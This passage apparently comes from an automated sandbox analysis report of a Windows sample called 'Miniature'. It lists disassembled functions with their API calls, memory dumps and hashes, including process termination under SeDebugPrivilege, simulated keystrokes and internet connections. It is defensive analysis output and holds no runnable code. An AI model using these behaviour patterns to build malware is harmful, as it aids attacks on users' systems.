                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA5CB8
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CA5CEB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CA5D25
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CA5D34
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ea4f9571e76ea8d38db303d1ca722ff2e551611e105dbaf9d63a1ca1923f9885
                                                                                                                                                                                                                                                                                            • Instruction ID: 1805718e643d6385a7c6e6753583a2f34ed656fdc38991b8946f76997d5cebfa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea4f9571e76ea8d38db303d1ca722ff2e551611e105dbaf9d63a1ca1923f9885
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5051C330A40A0ABFEF249F15CC49BD83B65FB0776DF14C111F6259A1E1C7769A84EB50
                                                                                                                                                                                                                                                                                            Function 00C113A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C528D1
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C528EA
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C528FA
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C52912
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C52933
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C52942
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C5295F
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C5296E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e8bad19b737ec52bd0775716191d81cc04b7fe264d7302adab736bf6680bfab7
                                                                                                                                                                                                                                                                                            • Instruction ID: 239041cbf81a08e103954592eb93d260b73f423250be0965273d734084a4b3b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8bad19b737ec52bd0775716191d81cc04b7fe264d7302adab736bf6680bfab7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38519A74600209AFDB24CF25CC81BAE7BF5FF4A724F144518FA52972A0D770EA80EB50
                                                                                                                                                                                                                                                                                            Function 00C8CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8CBC7
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8CBDA
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C8CBEE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8CCB7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: GetLastError.KERNEL32 ref: 00C8CD67
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: SetEvent.KERNEL32(?), ref: 00C8CD7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8CC98: InternetCloseHandle.WININET(00000000), ref: 00C8CD86
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 27d9d25c3d1ddb39bfbdf8d065aff8d5102fd4bbc006cbb36eb86ae85c123871
                                                                                                                                                                                                                                                                                            • Instruction ID: 552afb4f328bcf109af808c51791d812f856806700851ef99187e129fe3663b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27d9d25c3d1ddb39bfbdf8d065aff8d5102fd4bbc006cbb36eb86ae85c123871
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63315971500B05AFDB21AF619984B7ABBB8FF45308B04852DF86B83A10C731E914AB64
                                                                                                                                                                                                                                                                                            Function 00C72EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F0A
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C72F28
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C72F2C
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F36
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C72F4E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C72F52
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C72F5C
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C72F70
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C72F74
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f41c4af1aa7ff2ccf20ec83ff14a94c23d27da2ded7581d1d7f962f058538e0b
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ce9b4364327ed0c02394f2faa27d74eb8dcb6f25301c14d9da008ed0a75388b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f41c4af1aa7ff2ccf20ec83ff14a94c23d27da2ded7581d1d7f962f058538e0b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01D430784220BBFB1067A99C8AF5D3F5ADB4EB25F100011F31EAF1E0C9E264459EA9
                                                                                                                                                                                                                                                                                            Function 00C72150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C71D95,?,?,00000000), ref: 00C72159
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C72160
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71D95,?,?,00000000), ref: 00C72175
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C71D95,?,?,00000000), ref: 00C7217D
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C72180
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71D95,?,?,00000000), ref: 00C72190
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00C71D95,00000000,?,00C71D95,?,?,00000000), ref: 00C72198
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C71D95,?,?,00000000), ref: 00C7219B
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00C721C1,00000000,00000000,00000000), ref: 00C721B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c054b4ed36bcc07d480ea6ff2292b4fed67c271559a94dbe52042eefc9ad060
                                                                                                                                                                                                                                                                                            • Instruction ID: 1a9e404105722cc12be3b6845ca89cd389f6b9cd36ef028b7c852c310a3abd85
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c054b4ed36bcc07d480ea6ff2292b4fed67c271559a94dbe52042eefc9ad060
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8201A8B5240304BFEA10ABA5DC49F6F7BACEB89715F418411FA06DB5A1DA709800CA20
                                                                                                                                                                                                                                                                                            Function 00C9AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7DDAC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00C7DDBA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DD87: CloseHandle.KERNEL32(00000000), ref: 00C7DE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9ABCA
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C9ABDD
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9AC10
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9ACC5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C9ACD0
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9AD21
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                            • Opcode ID: d1d95acbc957ab34722f86c166759fafa14b0bb6fb222c3a57293358dbee8527
                                                                                                                                                                                                                                                                                            • Instruction ID: de31c58f78769c1c510f5d97575a4b2dbf30af038b4aee5c555120f5618f75da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1d95acbc957ab34722f86c166759fafa14b0bb6fb222c3a57293358dbee8527
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F61AE71208241AFDB10DF15C488F29BBE1AF44318F54849CE8668FBA2C772ED85DBD2
                                                                                                                                                                                                                                                                                            Function 00CA4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA43C1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CA43D6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA43F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA4435
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA4462
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA4490
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                            • Opcode ID: 29ff33b5f1b3c2db2600c5fe358d378acebf8dfe1b6cb45dedda0caf7c19737a
                                                                                                                                                                                                                                                                                            • Instruction ID: ff3a0dea6258b4300eb5c0a208a4c52eb45adae4cab60c21a2674f7cf6ed6c3f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29ff33b5f1b3c2db2600c5fe358d378acebf8dfe1b6cb45dedda0caf7c19737a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041F17190030AABDF25DF64CC49BEE7BA9FF49364F100126F915E7291D7B09980DB90
                                                                                                                                                                                                                                                                                            Function 00C7C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7C6C4
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 00C7C6E4
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C7C71A
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(01946320), ref: 00C7C76B
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(01946320,?,00000001,00000030), ref: 00C7C793
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                            • Opcode ID: c36203855ca8d7a6744655d9b6c5dc14141d2ec7dd168770aeb610df5c5241f9
                                                                                                                                                                                                                                                                                            • Instruction ID: 51ea272f9ff349790ea98015dac2b56b40f3231af280564ee861ba0169de6d65
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c36203855ca8d7a6744655d9b6c5dc14141d2ec7dd168770aeb610df5c5241f9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83519070A002069BDF18CF69D8C4BAEBBF5AF55314F24C11EE92A97291DB709A40CF51
                                                                                                                                                                                                                                                                                            Function 00C7D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C7D1BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                            • Opcode ID: 5bb72eacffa061b3b992fd8607c95e2a83528f7350c154f3a72b07a992e46438
                                                                                                                                                                                                                                                                                            • Instruction ID: 4b429f8b819ae6ba0f0f382644916bbd47f106eb7e37cb8bcbc70220b06d3713
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bb72eacffa061b3b992fd8607c95e2a83528f7350c154f3a72b07a992e46438
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF11063235C307BBE7095B15EC82DAE77BC9F05B70F60402AF90BA62C1E7B0AB404660
                                                                                                                                                                                                                                                                                            Function 00C7E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                            • Opcode ID: c0cfde7f33740c51407c191b538d9ff462607a4ac987f44b714339b5c4b92844
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ae91aed321bb21cde54c7703740846efbe7d816c3d8fba3f4c7aff5c4f7a043
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0cfde7f33740c51407c191b538d9ff462607a4ac987f44b714339b5c4b92844
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A11B4329001157BCB286B64DC4AFDE77ACEF05714F0040A5F55AE6091EF749A82EB60
                                                                                                                                                                                                                                                                                            Function 00C6E77A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C6E785
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6E797
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C6E7BD
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C6E7D4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
